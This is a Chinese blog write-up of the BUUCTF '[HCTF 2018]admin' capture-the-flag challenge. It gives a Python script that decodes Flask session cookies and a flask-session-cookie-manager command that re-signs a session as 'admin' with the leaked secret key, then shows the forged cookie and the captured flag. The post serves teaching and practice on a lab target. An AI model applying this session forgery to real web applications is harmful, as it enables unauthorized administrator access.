BUUCTF之 [HCTF 2018]admin

最新推荐文章于 2023-11-05 10:08:50 发布
最新推荐文章于 2023-11-05 10:08:50 发布
阅读量891 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: servlet 网络安全 安全 php flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62107966/article/details/126991164
版权

 

这里的ckj123等下使用脚本时是需要用来作为参数的。

 刚刚以 1 用户登进去后给了个session

源代码的意思是:

用户如果以admin的身份登录,就直接可以拿到flag了,所以直接注册账号为admin,密码为123就成功拿到flag了。如果使用脚本的话,就需要伪造session为admin登陆的时候。

这是以用户1登录时的session
.eJxFUMtqg0AU_ZVy11moMRshC2FqsTBXlDHD3E1IjInOIwWTYJyQf69NoV0eDuf5gO1xaC8dJNfh1i5g2x8gecDbHhJAV1n8UCMKsiQzq2RmSGeWRzMW9Z3rxpPADl0eoFcxilOMOh2RbXoSaUTa6oKlYSHrCfWnJVYukVWGi6rjPr8TawISXY9OBT8adOWkRLlCmfUoMlcIdVe-jpSsl6grXQgTorZOuY3h_n1CyUc156Bv1vBcQHMZjtvrl2nP_xPYoSOHeo7tUfOJmIm5zEfSJsZIRUqrFWd5RC6ba_GQe-x4un7Z9W53av-cuLRhW_4y552bCQhhAbdLO7w-gzCA5zeHeWv6.Yyv-hQ.FKxl_VbNWhs_qhLkAV7jzZVTrdI

 使用脚本解密,脚本命名为session解密.py

脚本如下:

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))		# 运行时需要输入一个参数

运行得到:

 得到如下:

{'_fresh': True, '_id': b'6de4f056eeaeaadf1e3fee51273e3a6b476858860045be06f9c8059e262ed4744d14a321d74e8b6f445b6d2a495ab51f961c56ae764c99569fbed3125c0a0677', 'csrf_token': b'47afcc44b632d981b0f987f6b69026fad13533a0', 'image': b'1iuy', 'name': '1', 'user_id': '10'}

将name的值修改为admin,重新用脚本在进行加密。

脚本下载地址:GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder

 命令如下:

python flask_session_cookie_manager3.py encode -s “ckj123” -t “ ”

ckj123就是最上面源码里面的,算是固定的吧

-t 后双引号里面就放上修改name的值为admin后的序列化字符串。

运行如下:

 

得到伪造用户为admin的session,如下:

.eJxFUMtqwkAU_ZVy1y6SNG4EF4FpSgpzQ8LEYe5GbIxmXhaiEjPivze10C4Ph_O8w_YwdOceVpfh2i1gq_ewusPLJ6wAfe3wXY0oyJHMnZK5JZM7nsxYNDdu2kACe_RFhEGlKI4pmmxEttEksoSMMyXL4lI2E5oPR6x6RVZbLuqeh-JGrI1I9Bq9in406KtJiWqJMtcocl8KdVOhSZRsXtHUphQ2RuO88hvLw9uEko9qzsHQruGxgPY8HLaXL9ud_iewfU8ezRyr0fCJmE25LEYyNsVEJcqoJWdFQj6fa_GYB-x5tn7aab87dn9OXLq4q36Z087PBOz2Xp9gAddzNzx_gziCxzdIem3S.YywCaw.P16KUe4sMQNjKXmyTSKVCrtGUQc

再在题目里修改session的值,刷新,成功拿到flag

 

flag{21ec9acc-8c8d-49ad-bccc-7253ac529067}

 

泪涌@
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HCTF2018-admin
迷风小白
09-11 1万+
前言 在BUUCTF上看到这题存在三种解法,感觉比较经典,就想着来复现一下顺便学习一波。存在以下三种解法: flask session 伪造 unicode欺骗 条件竞争 审题 拿到题目发现一共就登录注册两个功能,随便注册一个test/test用户 登录之后查看源码发现提示<!-- you are not admin -->,根据提示和题目名估计要让我们登录admin用户就可以得...
BUUCTF学习笔记-admin
Emmawas的博客
09-25 1276
CTF考点:session欺骗、flask框架
[HCTF 2018]admin (三种解法详细详解)
记录学习,一起进步
01-17 2403
[HCTF 2018]admin
[HCTF 2018]admin
Knsec
05-18 3113
[HCTF 2018]admin
[HCTF 2018]admin三种解法
u011250160的博客
12-14 5715
打开题目有两个选项以及一个提示信息 判断我们是要以admin的身份登录 这样的话肯定是对login页面进行一番鼓捣 先弱口令爆破一波,因为是个弱口令(123),爆破也能爆破出来 然后这个题就结束了(太tm出乎意料了)… 弱口令不行的话就试试sql注入以及ssti注入 尝试抓包修改自己的角色(实战中真碰到过) 以上就是常规思路 当然这个题不该设个弱口令在那 看下其他的解法 解法一:session伪造 随便注册个账号登录发现新大陆 在change password页面源码发现源码 去github下载源码
BUUCTF:[HCTF 2018]admin
末初的CSDN博客
10-28 787
题目地址:https://buuoj.cn/challenges#[HCTF%202018]admin 第一种解法:弱密码 根据提示,尝试弱密码登录admin用户,当admin的密码为123时,登陆成功 第二种解法:Unicode欺骗 随便注册个用户mochu7,在Change Password 给出来题目源码,/hctf_flask/app/rotus.py register和login对用户名使用了自定义函数strlower() nodeprep.prepare()来自 from tw.
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
2018手工更新FlatLab Admin Template
09-15
"2018手工更新FlatLab Admin Template"是一款专为后台管理系统设计的模板,它集成了现代化的设计风格和丰富的功能组件。FlatLab以其扁平化的设计理念,提供了高效且直观的用户界面,使得管理员能够轻松地进行数据...
Ace Admin 2018.4最新版
04-17
"Ace Admin 2018.4最新版" 提供了最新的更新和改进,确保了开发者可以利用最新的技术进行开发。 Ace Admin 的核心特性包括: 1. **响应式布局**:它支持各种设备,从小屏幕手机到大屏幕桌面,都能提供良好的用户...
fastadmin事务管理系统
05-27
FastAdmin事务管理系统 FastAdmin事务管理系统是一种基于Web的事务管理系统,旨在帮助管理员更好地管理事务流程和数据。下面是该系统的一些重要知识点: 登录 Token 设计 FastAdmin的事务管理系统使用 Token-...
Thin Admin Template 后台模板2018最新
10-18
Thin Admin Template 是一款在2018年推出的后台管理模板,设计简洁且高效,适合用于构建各类企业级的后台管理系统。这款模板以其轻量级、响应式布局和丰富的功能组件而受到开发者的欢迎。下面将详细阐述这款模板的几...
buuctf之[HCTF 2018]admin
qq_42728977的博客
12-06 472
[HCTF 2018]admin考点session伪造流程思考参考 考点 1、弱口令 2、flask框架 session伪造 3、代码审计 unicode strlower()函数审计 session伪造流程 change页面的源码,泄露后台源码 index源码看得到,要admin登录 所以查看后台源码 发现需要登录认证和session[‘name’]为admin,那就伪造呗。 flask session伪造 session漏洞 流程: 先注册一个用户test/test,并登录 拿到session,
BUUCTF——[HCTF 2018]admin
Ho1aAs‘s Blog
05-16 824
文章目录利用点审题解题——Flask session解2——Unicode编码欺骗解3——(非预期)弱口令爆破参考完 利用点 Flask session Unicode编码欺骗 (非预期)弱口令爆破 审题 打开环境,主页仅提供了login和register两项服务,hctf的超链接打开是404 提示那么少,先看看主页的源码 结合题目以及提示,可以断定是要登录管理员账户,先注册一个账户,看看登录有些什么内容 新增了post和change password功能,在change password找到hin
BUUCTF [web专项23][HCTF 2018]admin
最新发布
yanglinchiji的博客
11-05 90
别人的做法是session伪造和unicode欺骗之类的。需要登录,题目提示admin,先用admin试试。发现密码是1竟然也能过(弱口令爆破)后面发现我这个算是投机取巧。右上角点击login。
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 7140
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
Buuctf admin
Dexret的博客
12-09 3308
打开该靶机,发现为一个登陆的界面 总共有三个界面,分别为主界面,login登陆界面和register注册界面 根据标题,猜测应该是让我们用admin的用户去登陆 尝试对登陆界面进行SQL注入 发现为500错误,无法对其注入 那么转换下思路,先注册一个进去看一下(admin用户无法被注册,需要用另外用户名) 发现里面有四个界面,第一个为主界面,第二个类似留言板,但是xss被完全过滤了,第三个为修改密码界面,第四个为退出 在这四个界面中,只剩下修改密码这个界面可以作为突破点 查看一下该页
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8341
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
FastAdmin使用手册:安装与功能详解
"fastadmin.pdf 是一份中文说明文档,详细介绍了 FastAdmin 框架的使用方法、安装过程以及各种功能。FastAdmin 是基于 ThinkPHP6 的后台管理系统,提供了丰富的功能模块,包括一键生成 CRUD、菜单、API 文档、插件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值